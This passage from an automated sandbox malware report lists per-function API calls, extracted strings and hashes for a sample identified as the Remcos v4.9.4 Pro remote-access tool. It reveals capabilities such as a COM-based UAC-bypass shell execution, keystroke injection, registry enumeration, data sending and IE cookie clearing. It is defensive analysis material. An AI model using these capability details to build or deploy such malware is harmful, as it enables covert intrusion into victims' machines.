                                                                                        • Opcode Fuzzy Hash: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                                                        • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tcp$udp
                                                                                        • API String ID: 0-3725065008
                                                                                        • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                        • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                                        • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                        • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
• SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
• GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
• SetLastError.KERNEL32(0000000E), ref: 00411DC9
  • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
• GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
• HeapAlloc.KERNEL32(00000000), ref: 00411E17
• SetLastError.KERNEL32(0000045A), ref: 00411F2A
  • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
  • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
• String ID: t^F
• API String ID: 3950776272-389975521
• Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
• Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
• Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
• Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
Uniqueness
Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 004018BE
• ExitThread.KERNEL32 ref: 004018F6
• waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: PkG$XMG$NG$NG
• API String ID: 1649129571-3151166067
• Opcode ID: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
• Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
• Opcode Fuzzy Hash: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
• Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
• MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000), ref: 00404BC3
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
• Opcode ID: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
• Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
• Opcode Fuzzy Hash: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
• Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• AllocConsole.KERNEL32(00475338), ref: 0041CDA4
• GetConsoleWindow.KERNEL32 ref: 0041CDAA
• ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: Console$Window$AllocOutputShow
• String ID: Remcos v$4.9.4 Pro$CONOUT$
• API String ID: 4067487056-3065609815
• Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
• Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
• Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
• Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
• SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
• SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
• SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
• SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
• SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
• SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
• SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: InputSend
• String ID:
• API String ID: 3431551938-0
• Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
• Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
• Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
• Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: __freea$__alloca_probe_16_free
• String ID: a/p$am/pm$zD
• API String ID: 2936374016-2723203690
• Opcode ID: e0ecee58873bfc0077d13325f43c3460f208f04ecf7db505f3535ec2a758da20
• Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
• Opcode Fuzzy Hash: e0ecee58873bfc0077d13325f43c3460f208f04ecf7db505f3535ec2a758da20
• Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
• RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]$xUG$TG
• API String ID: 3554306468-1165877943
• Opcode ID: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
• Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
• Opcode Fuzzy Hash: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
• Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: D[E$D[E
• API String ID: 269201875-3695742444
• Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
• Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
• Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
• Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: CloseEnumInfoOpenQuerysend
• String ID: xUG$NG$NG$TG
• API String ID: 3114080316-2811732169
• Opcode ID: f05c03517f952f3a355b8cbbd5c3f5256b4ab212a1f163f9846f57004d6dde5d
• Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
• Opcode Fuzzy Hash: f05c03517f952f3a355b8cbbd5c3f5256b4ab212a1f163f9846f57004d6dde5d
• Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
Uniqueness
Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                                                                        • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                                                                        • __freea.LIBCMT ref: 0045121D
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 313313983-263838557
                                                                                        • Opcode ID: 91877320caf02f46ead72dc2d27e097aa9d58b2df1b48cbe6668f1112c1efda2
                                                                                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                                        • Opcode Fuzzy Hash: 91877320caf02f46ead72dc2d27e097aa9d58b2df1b48cbe6668f1112c1efda2
                                                                                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                                                                          • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                                          • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                        • _wcslen.LIBCMT ref: 0041B763
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                        • API String ID: 3286818993-122982132
                                                                                        • Opcode ID: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                                                                        • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                                        • Opcode Fuzzy Hash: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                                                                        • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                          • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                        • API String ID: 1133728706-4073444585
                                                                                        • Opcode ID: 1e05d710c332b0c32bace29fd72cf7e3a184a0c4047cd7709485bc9a7fc4ad42
                                                                                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                                        • Opcode Fuzzy Hash: 1e05d710c332b0c32bace29fd72cf7e3a184a0c4047cd7709485bc9a7fc4ad42
                                                                                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                                                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                                        • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                                                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                                        • _free.LIBCMT ref: 00450F48
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00450F53
                                                                                        • _free.LIBCMT ref: 00450F5E
                                                                                        • _free.LIBCMT ref: 00450FB2
                                                                                        • _free.LIBCMT ref: 00450FBD
                                                                                        • _free.LIBCMT ref: 00450FC8
                                                                                        • _free.LIBCMT ref: 00450FD3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                                        • int.LIBCPMT ref: 00411183
                                                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                        • String ID: (mG
                                                                                        • API String ID: 2536120697-4059303827
                                                                                        • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                                                        • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                                        • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\Public\Libraries\nmfsxfjX.pif), ref: 004075D0
                                                                                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                        • CoUninitialize.OLE32 ref: 00407629
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                                        • String ID: C:\Users\Public\Libraries\nmfsxfjX.pif$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                        • API String ID: 3851391207-3769394047
                                                                                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
